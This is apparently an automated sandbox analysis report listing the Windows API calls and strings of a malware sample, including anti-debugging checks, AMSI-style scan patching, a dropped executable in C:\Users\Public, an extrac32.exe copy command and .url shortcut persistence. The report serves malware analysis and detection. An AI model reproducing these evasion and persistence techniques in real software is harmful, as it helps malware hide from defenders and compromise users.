                                                                              • Graph rendering not reproduced. Function at 299da24; calls along the graph: GetModuleHandleW (ntdll), GetProcAddress (ZwQueryInformationProcess), NtQueryInformationProcess with information class 0x1F (ProcessDebugFlags), i.e. a debugger-presence check.
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(ntdll), ref: 0299DA34
                                                                              • GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299DA46
                                                                              • NtQueryInformationProcess.NTDLL(FFFFFFFF,0000001F,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299DA65
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleInformationModuleProcProcessQuery
                                                                              • String ID: ZwQueryInformationProcess$ntdll
                                                                              • API String ID: 3384173408-191046249
                                                                              • Opcode ID: 9b377f97e4dc4a70d0a1908ea7d53cda15bfc19f25c600e5fe107f01432d755b
                                                                              • Instruction ID: def9b959e3a6a1291b8ef230d767503e7a24683438fac0fca57f9f55c55b2775
                                                                              • Opcode Fuzzy Hash: 9b377f97e4dc4a70d0a1908ea7d53cda15bfc19f25c600e5fe107f01432d755b
                                                                              • Instruction Fuzzy Hash: 4BF0B470D48248BAEF10AAFC8C89BEDB7AC9B05334F144391A934A61C1D77453108B65

                                                                              Control-flow Graph
                                                                              • Graph rendering not reproduced. Function at 299d9a4; calls along the graph: GetModuleHandleW (ntdll), GetProcAddress (ZwQueryInformationProcess), NtQueryInformationProcess with information class 0x07 (ProcessDebugPort), i.e. a debugger-presence check.
APIs
• GetModuleHandleW.KERNEL32(ntdll), ref: 0299D9B4
• GetProcAddress.KERNEL32(00000000,ZwQueryInformationProcess), ref: 0299D9C6
• NtQueryInformationProcess.NTDLL(FFFFFFFF,00000007,?,00000004,?,00000000,ZwQueryInformationProcess,ntdll), ref: 0299D9E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressHandleInformationModuleProcProcessQuery
• String ID: ZwQueryInformationProcess$ntdll
• API String ID: 3384173408-191046249

Control-flow Graph
APIs
• GetModuleHandleW.KERNEL32(KernelBase), ref: 0299D930
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0299D942
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0299D959
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressCheckDebuggerHandleModulePresentProcRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 35162468-539270669
APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
Strings
• C:\Windows\System32\ntdll.dll, xrefs: 0299794C
• NtAllocateVirtualMemory, xrefs: 02997947
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
Strings
• C:\Windows\System32\ntdll.dll, xrefs: 0299794C
• NtAllocateVirtualMemory, xrefs: 02997947
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
APIs
  • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C8D3
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0299C968), ref: 0299C903
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0299C918
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0299C944
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0299C94D
  • Part of subcall function 02984C0C: SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
APIs
• LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
• GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
• GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
  • Part of subcall function 02997D4C: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997D8D
  • Part of subcall function 02997D4C: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997D93
  • Part of subcall function 02997D4C: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997DAD
  • Part of subcall function 02997B5C: GetModuleHandleW.KERNEL32(KernelBase,00000000,02997C60,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02997BDE
  • Part of subcall function 02997B5C: GetProcAddress.KERNEL32(00000000,KernelBase), ref: 02997BE4
  • Part of subcall function 02997B5C: GetCurrentProcess.KERNELBASE ref: 02997BEE
  • Part of subcall function 02997A94: GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AD8
  • Part of subcall function 02997A94: GetProcAddress.KERNEL32(00000000,ntdll), ref: 02997ADE
  • Part of subcall function 02997A94: NtWriteVirtualMemory.NTDLL(?,?,?,?,?,00000000,ntdll,00000000,00000000,02997B18,?,?,00000000), ref: 02997AFC
• NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
• FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc$LibraryVirtual$CacheCurrentFlushFreeInstructionLoadMemoryProcessProtectWrite
• String ID:
• API String ID: 720200146-0
APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299D166
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
APIs
• GetTickCount.KERNEL32 ref: 0299CD82
• Sleep.KERNEL32(00000000,?,0299DCF4,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 0299CD94
• GetTickCount.KERNEL32 ref: 0299CD99
Strings
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: CountTick$Sleep
• String ID: 500
• API String ID: 4250438611-612300854
APIs
  • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
APIs
  • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
APIs
• RtlInitUnicodeString.N(?,?,00000000,0299C79E), ref: 0299C74C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C762
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C781
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: Path$DeleteFileInitNameName_StringUnicode
• String ID:
• API String ID: 1459852867-0
APIs
  • Part of subcall function 02984ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02984EDA
• RtlInitUnicodeString.N(?,?,00000000,0299C79E), ref: 0299C74C
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C762
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C781
  • Part of subcall function 02984C0C: SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
Memory Dump Source
• Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
Yara matches
Similarity
• API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
• String ID:
• API String ID: 1694942484-0
                                                                              • Opcode ID: 3e8c7effac4365625eed523c8ecbd48fa550ee0f71bc16f548c736b16cf9a7d0
                                                                              • Instruction ID: ab3c6765074284f8db15dff43c78ab5edebf0d196b887aa8f9cc17fac3369bd6
                                                                              • Opcode Fuzzy Hash: 3e8c7effac4365625eed523c8ecbd48fa550ee0f71bc16f548c736b16cf9a7d0
                                                                              • Instruction Fuzzy Hash: 8501EC71A40209BAEB11EAE4CD42FDEB7BDEB88710F505462A604E2580EB75AB049A64
                                                                              APIs
                                                                                • Part of subcall function 02996CFC: CLSIDFromProgID.OLE32(00000000,?,00000000,02996D49,?,?,?,00000000), ref: 02996D29
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,02996E3C,00000000,00000000,02996DBB,?,00000000,02996E2B), ref: 02996DA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFromInstanceProg
                                                                              • String ID:
                                                                              • API String ID: 2151042543-0
                                                                              • Opcode ID: dd1ed7af437c4097e4dc395b025f299e4c6234e4f9bd649dfa0e257b9b5282a7
                                                                              • Instruction ID: c8322c952b31b16316e2e6e381f8e918b34fb964fd154ebf515b6884f7730129
                                                                              • Opcode Fuzzy Hash: dd1ed7af437c4097e4dc395b025f299e4c6234e4f9bd649dfa0e257b9b5282a7
                                                                              • Instruction Fuzzy Hash: 1D01A771608704AEEB15EFA8DC52D6B7BADEBC9B20B520835F901D2690E6319910D974
                                                                              APIs
                                                                                • Part of subcall function 02999EF8: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0299A185
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 2242398760-0
                                                                              • Opcode ID: 98e883a53df079a80d29c80db714be19e562ca05cad128db8ae235b0ddcebca9
                                                                              • Instruction ID: 69841fc8b8da92d3f8f7ba29d0616cfa29ef8cd60116777100ac9c108218f549
                                                                              • Opcode Fuzzy Hash: 98e883a53df079a80d29c80db714be19e562ca05cad128db8ae235b0ddcebca9
                                                                              • Instruction Fuzzy Hash: 95C08073A02524176E1066FC2FC44D3874DCD491B730408A3B509D3101D7158C115590

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 02987E20: GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                                • Part of subcall function 0299C7B4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
                                                                                • Part of subcall function 0299C7B4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
                                                                                • Part of subcall function 0299C7B4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
                                                                                • Part of subcall function 0299C7B4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
                                                                              • Sleep.KERNEL32(00001388,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,UacScan,029D7358,029A8D7C), ref: 029A30F8
                                                                                • Part of subcall function 0299C724: RtlInitUnicodeString.N(?,?,00000000,0299C79E), ref: 0299C74C
                                                                                • Part of subcall function 0299C724: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C762
                                                                                • Part of subcall function 0299C724: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C79E), ref: 0299C781
                                                                              • WinExec.KERNEL32(00000000,029A91C4), ref: 029A41BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FilePath$LibraryNameName_$AddressAttributesCacheCloseCreateDeleteExecFlushFreeHandleInitInstructionLoadModuleProcSleepStringUnicodeWrite
                                                                              • String ID: .url$C:\Users\Public\$C:\Users\Public\xkn.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$MZP$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]
                                                                              • API String ID: 2549772469-2280755070
                                                                              • Opcode ID: b9071439501b138a0ae4ff114c7108c9229e629a14fdef572aafa71ef60716d6
                                                                              • Instruction ID: 85a5606f3d206fbbb7175b1e73e9c1d3655bc23cc72181e163a66bdb50971a67
                                                                              • Opcode Fuzzy Hash: b9071439501b138a0ae4ff114c7108c9229e629a14fdef572aafa71ef60716d6
                                                                              • Instruction Fuzzy Hash: BB23F935B5021A8FEB20FBA4CC90ED9B3B6BFD9310F1455E69009EB250DB31AE819F55

                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 0299D3F0: RegOpenKeyA.ADVAPI32(?,00000000,029D7648), ref: 0299D434
                                                                                • Part of subcall function 0299D3F0: RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D46C
                                                                                • Part of subcall function 0299D3F0: RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D477
                                                                              • WinExec.KERNEL32(00000000,00000000), ref: 029A565A
                                                                                • Part of subcall function 0299A1D4: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 0299A297
                                                                              • RtlMoveMemory.N(00000000,00000004,00000000,?,ScanBuffer,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C), ref: 029A5BDC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCacheCloseCompareExecFlushFreeHandleInstructionLoadMemoryModuleMoveOpenProcStringValue
                                                                              • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                              • API String ID: 17596641-872072817
                                                                              • Opcode ID: 56b5f27f1e17a53565e0c5800abb19fae545d03df768ed965c6fe6f8723af003
                                                                              • Instruction ID: 8b15d43df0d7c84052d3c0f929c4da8579568d5dfe8c98756b9663b363be7092
                                                                              • Opcode Fuzzy Hash: 56b5f27f1e17a53565e0c5800abb19fae545d03df768ed965c6fe6f8723af003
                                                                              • Instruction Fuzzy Hash: A2921934A5025A8FDB20FBA4CD90EED73B6BFD9310F1454E5E008EB654DA71AE819F44

                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,02982000), ref: 029817D0
                                                                              • Sleep.KERNEL32(0000000A,00000000,?,02982000), ref: 029817E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 9c18db5680da34345526d60cdf132b845007d455a62476b3cd15e620acc78148
                                                                              • Instruction ID: 4f2be6a619373ae81a54464a93f294bfc0e577168ff41987f09a5503ad2e5ae9
                                                                              • Opcode Fuzzy Hash: 9c18db5680da34345526d60cdf132b845007d455a62476b3cd15e620acc78148
                                                                              • Instruction Fuzzy Hash: 9BB11072A063518FCB15DF68E8C0366BBE1EB86325F1D86AED44DCB385D7709492CB90

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997D8D
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997D93
                                                                              • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                              • String ID: irtualProtect$kernel32
                                                                              • API String ID: 2099061454-2063912171
                                                                              • Opcode ID: e4d7c4530d7324b4042a30a619a60ffe5edeba095cdf982a0eb3cbde572ed4dc
                                                                              • Instruction ID: 7821ed930f6293ab9f2c57abd5346d9d48aa6cf67b259e0e4e94cf2c6d8c5b4e
                                                                              • Opcode Fuzzy Hash: e4d7c4530d7324b4042a30a619a60ffe5edeba095cdf982a0eb3cbde572ed4dc
                                                                              • Instruction Fuzzy Hash: 1F017CB5644208BFEB01EFECDC41EAEB7EDEF89720F514450B814D7680DA30AE008A24
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?), ref: 02981B17
                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 02981B31
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 6029829591449855e7d370d1902a5c108918de7f5f5aa2cf4cb1ae81fa766d95
                                                                              • Instruction ID: 34031eeece404a504b246ba1b4a3598e2f5126b3bf3598a5b1bc00c9188aefa8
                                                                              • Opcode Fuzzy Hash: 6029829591449855e7d370d1902a5c108918de7f5f5aa2cf4cb1ae81fa766d95
                                                                              • Instruction Fuzzy Hash: 0E51C2716052408FD715EF7CD984766BBE8AF86314F1C85AED44CCB286E770D886CBA1
                                                                              APIs
                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299D166
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CheckConnectionInternet
